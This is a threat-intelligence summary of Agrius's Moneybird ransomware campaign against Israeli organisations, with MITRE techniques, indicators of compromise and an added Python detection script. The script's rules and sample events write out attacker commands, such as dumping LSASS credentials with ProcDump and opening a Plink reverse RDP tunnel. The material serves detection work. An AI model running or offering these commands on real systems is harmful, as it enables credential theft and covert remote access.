Two security researchers analyze Agrius’ use of Moneybird, a targeted ransomware variant, against Israeli organizations and reveal its sophisticated yet narrowly focused approach. The findings show Moneybird is a new tool in Agrius’ arsenal, with bespoke encryption features and strong ties to the group’s established TTPs.
#Moneybird #Agrius #Shirbit #BarIlanUniversity #Apostle #MOIS
Key Points
- Agrius, an Iran-aligned threat actor, continues to target Israeli targets, masking destructive operations as ransomware.
- Moneybird is a newly observed ransomware written in C++, deployed by the group in recent Israeli attacks.
- Moneybird is presented under its own alias, but the operation is linked to Agrius, and the data leakage is tied to a known Agrius alias.
- The operation is targeted, encrypting only specific paths, rather than a mass, indiscriminate campaign.
- Moneybird’s deployment aligns with Agrius’ established TTPs, signaling continuity in the group’s behavior.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Agrius’ first foothold was established by exploiting vulnerabilities within public-facing web servers; ‘exploiting vulnerabilities within public-facing web servers, leading to the deployment of unique variants of ASPXSpy.’
- [T1505.003] Web Shell – ASPXSpy webshells were deployed in a unique fashion, hidden inside a Certificate text file; ‘ASPXSpy webshells were deployed in a unique fashion, hidden inside “Certificate” text files.’
- [T1046] Network Service Discovery – The publicly available SoftPerfect Network Scanner was used to scan internal networks; ‘SoftPerfect Network Scanner – Scan internal networks.’
- [T1021.001] Remote Services – Plink used to tunnel RDP traffic from a VPS; ‘Plink – RDP tunnel traffic from a VPS owned by the actor.’
- [T1003.001] Credential Dumping – ProcDump used to dump LSASS and harvest credentials; ‘ProcDump – Dump LSASS and harvest credentials.’
- [T1041] Exfiltration – FileZilla used to exfiltrate compressed files; ‘FileZilla – Exfiltrate compressed files.’
- [T1486] Data Encrypted for Impact – Moneybird encrypts data using AES-256-GCM with per-file keys; ‘encryption using AES-256 with GCM mode.’
- [T1564] Hide Artifacts – Webshells hidden inside a fake certificate text file illustrate artifact hiding; ‘hidden inside “Certificate” text files.’
Indicators of Compromise
- [Domain] ufile.io, easyupload.io – used by the actor to download payloads; ‘legitimate file sharing services ufile[.]io and easyupload[.]io.’
- [File hash] Moneybird sample hash – aa19839b1b6a846a847c5f4f2a2e8e634caeebeeff7af59865aecca1d7d9f43c
- [String] Ransom note phrases – WE ARE MONEYBIRD!, All of your data encrypted!
- [File] Moneybird PDB path – C:\Users\user\Desktop\moneybird\x64\Release\moneybird.pdb
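As an added detection example (not code from the original report), the script below correlates the tool chain listed under MITRE Techniques and the ransom-note phrases listed under Indicators of Compromise. The event field names (`host`, `image`, `cmdline`), the sample events and the flagging threshold are assumptions, not taken from any real telemetry product.

```python
"""Detection sketch for the Agrius/Moneybird tool chain summarised above.
Field names (host, image, cmdline), sample events and the threshold are assumed."""
import re
from collections import defaultdict

# Each rule: (MITRE id, description, regex over lowercased "image cmdline")
RULES = [
    ("T1046",     "SoftPerfect Network Scanner", re.compile(r"netscan(64)?\.exe")),
    ("T1021.001", "Plink tunnel carrying RDP",   re.compile(r"plink(64)?\.exe.*\b3389\b")),
    ("T1003.001", "ProcDump against LSASS",      re.compile(r"procdump(64)?\.exe.*lsass")),
    ("T1041",     "FileZilla exfiltration",      re.compile(r"filezilla\.exe")),
    ("T1486",     "Moneybird ransomware binary", re.compile(r"moneybird\.exe")),
]

# Ransom-note phrases quoted in the IoC list above
RANSOM_NOTE_MARKERS = ("WE ARE MONEYBIRD!", "All of your data encrypted!")


def match_event(event):
    """Return the MITRE ids whose rule matches a single process-creation event."""
    text = f"{event['image']} {event['cmdline']}".lower()
    return [tid for tid, _, rx in RULES if rx.search(text)]


def score_hosts(events, threshold=2):
    """Group matches per host; flag a host only when it shows at least
    `threshold` distinct techniques, so a lone FileZilla or scanner run
    (both legitimate admin tools) does not fire on its own."""
    seen = defaultdict(set)
    for ev in events:
        for tid in match_event(ev):
            seen[ev["host"]].add(tid)
    return {h: sorted(t) for h, t in seen.items() if len(t) >= threshold}


def looks_like_ransom_note(text):
    """True when dropped file content carries the Moneybird ransom-note phrases."""
    return any(marker in text for marker in RANSOM_NOTE_MARKERS)


# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address
SAMPLE_EVENTS = [
    {"host": "srv01", "image": "C:\\Tools\\netscan.exe", "cmdline": "netscan.exe /range:10.0.0.0/24"},
    {"host": "srv01", "image": "C:\\Tools\\procdump64.exe", "cmdline": "procdump64.exe -ma lsass.exe out.dmp"},
    {"host": "srv01", "image": "C:\\Tools\\plink.exe", "cmdline": "plink.exe -R 3389:127.0.0.1:3389 user@203.0.113.10"},
    {"host": "ws07", "image": "C:\\Program Files\\FileZilla\\filezilla.exe", "cmdline": "filezilla.exe"},
    {"host": "ws07", "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
]

if __name__ == "__main__":
    for host, techniques in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(techniques)}")  # prints "srv01: T1003.001, T1021.001, T1046"
```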